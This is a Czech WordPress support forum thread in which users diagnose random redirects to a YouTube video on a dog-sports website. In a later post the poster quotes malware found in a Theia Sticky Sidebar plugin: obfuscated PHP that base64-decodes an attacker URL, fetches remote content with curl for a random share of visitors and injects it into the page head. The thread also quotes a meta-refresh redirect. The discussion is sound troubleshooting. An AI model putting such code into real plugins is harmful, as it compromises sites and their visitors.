Náhodné přesměrování na youtube

Úvodní stránka Fórum podpory WordPressu Problémy s WordPressem Náhodné přesměrování na youtube

Zvolené téma obsahuje celkem 23 odpovědí. Do diskuze (3 účastníci) se naposledy zapojil uživatel  n3s4 a poslední změna je stará 9 let, 8 měsíců.

Aktuálně je na stránce zobrazeno 20 příspěvků - 1. až 20. (z celkem 24)
  • Autor
    Příspěvky
  • #18720

    n3s4
    Participant

    Zdravím, psalo mi hodně lidí, že na našem webu se stává, že po kliknutí na nějaký – pokaždé náhodně jiný odkaz se stránka přesměruje na youtube video s justinem biebrem :/

    Může být web nějak napaden? Zkoušel jsem stránky procházet a po kliknutí na odkaz se někdy stránky opravdu přesměrují. Poradí někdo?

    Web je: http://www.sportovni-kynologie.cz/
    WordPress: teď nevím jakou přesně verzi máme

    #18728

    admin
    Keymaster
    Web

    Tak na uvedený web se ani nedostanu, protože jsem rovnou přesměrován na Youtube :-) Patrně došlo k nějakému napadení nebo nekorektnímu chování nějakého pluginu. Zkuste prozkoumat soubory na FTP, třeba si všimnete nějaké úpravy. Dále je třeba deaktivovat pluginy a nasadit výchozí šablonu Twenty Fourteen. Pokud problém stále přetrvává, tak byly patrně napadeny přímo jádrové soubory WordPressu. Ještě než celý WordPress aktualizujete, tak by bylo zajímavé zjistit, co to bylo za útočníka, jak se na web dostal a co tam vlastně provedl…

    #18739

    weskomfort
    Participant
    Web

    Dobrý den,

    podle zdrojáku máte infekci v hlavičce

    <meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=RFngSCaY5nA"/><style type="text/css">

    Našel jsem, že to řešili tady.

    #18742

    admin
    Keymaster
    Web

    weskomfort: Pěkné, díky! Teď už zbývá jen zjistit, jak se to tam dostalo a kde je ten kód konkrétně umístěn. Ale to už bude muset udělat Lukas :-)

    #18744

    n3s4
    Participant

    Zdravím, díky za rady, ale ve zdrojáku na webu nikde toto přesměrování nevidím.. Zkouším prohledat pluginy, jestli to není někde u nich…

    #18745

    n3s4
    Participant

    Tak už jsem toto přesměrování v kódu našel, ale zjistil jsem, že se objevuje nějak náhodně, nikoliv pokaždé.

    Abych pravdu řekl, dle FTP nepoznám změny, jelikož aktualizuji pluginy a tím pádem je téměř vše upravované… Navíc se mi nějak moc nechce deaktivovat plugin po pluginu abych to zjistil, který to případně způsobuje… nechtěl bych přijít o nastavení apod u pluginu…

    #18746

    weskomfort
    Participant
    Web

    Nevím co jste přesně hledal za kód, ale zkuste třeba pomocí PSPadu prohledat soubory pluginů na výskyt adres uvedených ve článku na který jsem dával odkaz.
    To znamená http://spamcheckr.com/l.php nebo http://spamcheckr.com/req.php případně spamcheckr.com protože může mít určitě i jiné modifikace.

    #18748

    n3s4
    Participant

    Zkoušel jsem prohledat celý stažený web pomocí FileSeek a našel jsem ono přesměrování <meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=RFngSCaY5nA"/> jen ve dvou statických souborech v cache adresáři od pluginu WP Super Cache. Takže jsem tento řádek smazal a vyčistil cache. Nyní již problém není.

    Jen netuším, jak se to tam mohlo dostat, když žádný jiný soubor tento kód neobsahoval. Ale mělo by to být vyřešené, uvidím, zda se mi to ještě stane či zda někdo z návštěvníků opět napíše o této chybě.

    #18789

    admin
    Keymaster
    Web

    Do cachovaných souborů se to dostalo patrně tak, že byl web napaden, ale nějakou aktualizací (pluginu či šablony) jste problém odstranil. Zůstal tak pouze na některých cachovaných stránkách. Pokud šlo o nějakou bezpečnostní chybu v pluginu/šabloně, která byla aktualizací odstraněna, tak můžete mít vyhráno. Pokud ale mají útočníci hesla k FTP či databázi, tak se může problém zase brzy objevit.

    Doporučení: Změnil bych raději hesla (FTP, databáze) a prohledal bych kromě souborů i obsah databáze.

    #18958

    n3s4
    Participant

    Zatím se to již nestalo. Mohu nějak zjistit, kdy byl například přístup do databáze a na ftp? Jsme u wedosu a tam asi nemají nějaký log..?

    #18959

    admin
    Keymaster
    Web

    Mohlo to zmizet třeba po nějaké aktualizaci. Přístupy do databáze se budou identifikovat špatně (samotný WordPress k ní přistupuje např. při každém zobrazení stránky) a pokud má někdo přístupy k FTP, tak se bude také špatně dohledávat, protože se bude robot hlásit pod stejným uživatelem (ale asi by to šlo odfiltrovat pomocí IP adresy). Na podrobnosti se ale budete muset zeptat přímo na podpoře. Používáte klasický hosting nebo VPS?

    Podobné téma se řešilo i zde. Je tam i tip na plugin, který umí sledovat soubory na FTP a pošle notifikační email při každé změně.

    #19379

    n3s4
    Participant

    Tak se to stále děje. Web se mi náhodně přesměrovává na youtube s Justinem Biebrem :/ Nevím, čím to je. Zkoušel jsem vše, nic se nevyřešilo. WordPress mám v nejnovější verzi, netuším, čím to může být?

    Změnil jsem přístupy na FTP a stále se to stává. Máte někdo tušení, jak zjistit, čím to je? Zkoušel jsem prohledat veškeré pluginy, celý web a nikde jsem dané fráze: http://spamcheckr.com/l.php nebo http://spamcheckr.com/req.php případně spamcheckr.com, <meta http-equiv=”refresh” content=”0; url=https://www.youtube.com/watch?v=RFngSCaY5nA”/> nenašel. Nevím si vůbec rady.

    #19380

    n3s4
    Participant

    Přesně stejný problém se řešil zde, ale nevím, když já nikde hledané kódy nenašel napříč celým webem…

    #19383

    admin
    Keymaster
    Web

    Co to znamená náhodně? Zkoušel jsem projít pár stránek na webu a nikam jsem přesměrován nebyl? Odkaz na youtube může být klidně šifrovaný a načítán z nějakého souboru pluginu. Zkuste prozkoumat FTP, zda nebyl v poslední době změněn např. nějaký soubor…

    #19384

    n3s4
    Participant

    No náhodně myslím, jako že jednou se nějaká stránka přesměruje a napodruhé už nikoliv, řešili to v těch diskuzích viz odkazy..

    Raději jsem smazal plugin WP Super Cache -, přesměrování
    <meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=RFngSCaY5nA"/>
    bylo vždy v cache ve statických html souborech.

    #19385

    weskomfort
    Participant
    Web

    Tak jsem to zkoušel taky a opravdu, pokud jednu stránku nechám několikrát načíst tak někdy se přesměruje. Napadá mě zkusit vypnout plugin na reklamy, protože to je asi jediné co se mění při každém načtení.
    Jinak opravdu nejste sám, ale vždy pomohlo najít škodlivý kód v pluginu, jako třeba zde nebo zde.

    #19386

    n3s4
    Participant

    Jaký plugin na reklamy? Já programem fileseek procházel komplet celý stažený web a našel to pouze ve statických souborech v cache adresáři, nikde jinde…

    #19387

    n3s4
    Participant

    Nejspíše vyřešeno, děkuji :) Infiltrace byla v pluginu Theia sticky sidebar:

    <?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_chesk() {if(function_exists('curl_init')) {$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_chesk');}}?>

    proto mi infiltraci FileSeek nenašel, URL spamcheckr.com/check.php byla zakódovaná… Až tento odkaz mi pomohl :)

    #19390

    weskomfort
    Participant
    Web

    Omlouvám se za špatný popis pluginu na reklamy. Byl jsem lenošný zjišťovat co je to za plugin :) . Ve Vašem případě to byl samozřejmě Theia sticky sidebar.

    #19409

    admin
    Keymaster
    Web

    Které klíčové slovo jste nakonec hledal? Oblíbená je např. funkce base64_decode(). Původně jsem myslel, že byl v cache uložen pouze pozůstatek napadení a web už byl vyčištěn, ale evidentně nikoli. Našel jste tak poprvé pouze důsledek (vložený HTML kód do cachovaných souborů), ale nezjistil příčinu (šifrovaný kód v .php souboru).

    Plugin Theia Sticky Sidebar je placený a jen mě napadá, zda jste zakoupil oficiální licenci nebo jste si nákazu přinesl z nějaké pirátské verze?

Aktuálně je na stránce zobrazeno 20 příspěvků - 1. až 20. (z celkem 24)

Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.

WordPress – novinky, návody a zajímavosti